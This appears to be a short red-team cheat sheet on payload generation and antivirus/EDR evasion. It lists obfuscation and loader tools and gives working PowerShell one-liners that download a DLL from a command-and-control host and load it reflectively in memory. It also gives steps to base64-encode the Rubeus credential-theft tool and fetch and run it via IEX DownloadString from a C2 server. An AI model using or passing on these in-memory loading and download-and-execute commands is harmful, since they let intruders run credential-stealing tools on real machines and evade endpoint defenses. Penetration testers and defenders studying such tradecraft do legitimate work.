Payload Generation & AV/EDR Evasion Tips + Devops

Tools

• OffensivePipeline
• ConfuserEx
• PowerStrip
• NetLoader
• SharpPack

---

Awesome Resources:

• Arty-hlr - How to bypass Defender in a few easy steps

---

Loading via System Reflection Assembly¹

Load DLL

$w = new-object system.net.webclient
$p = w$.Downloaddata("https://c2.domain.com/dllfile")
[system.reflection.assembly]::Load($p)
$a = new-object namespace.class
$a.method()

Example: Rubeus²

• Convert Exe file to Base64 via powershell

  [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Rubeus.exe")) | Out-File -Encoding ASCII C:\Temp\rubeus.txt
  

• Create a ps1 file (i.e. rubeus.ps1) with the contents below but replace the <BASE64dRubeus> with the base64 output of the command above (rubeus.txt)
  • This step will save a lot of time rather than executing the base64 output directly and pasting a lot of characters to your (remote) powershell terminal.

    $RubeusAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("<BASE64dRubeus>"))
    

• Download via your c2

  IEX(New-Object System.Net.WebClient).DownloadString("https://<c2>:443/rubeus.ps1")
  

---

1. Move Aside Script Kiddies–Malware Execution in the Age of Advanced Defenses | Joff Thyer  ↩

2. Github - Ghostpack - Rubeus ↩

---

Last update: May 24, 2021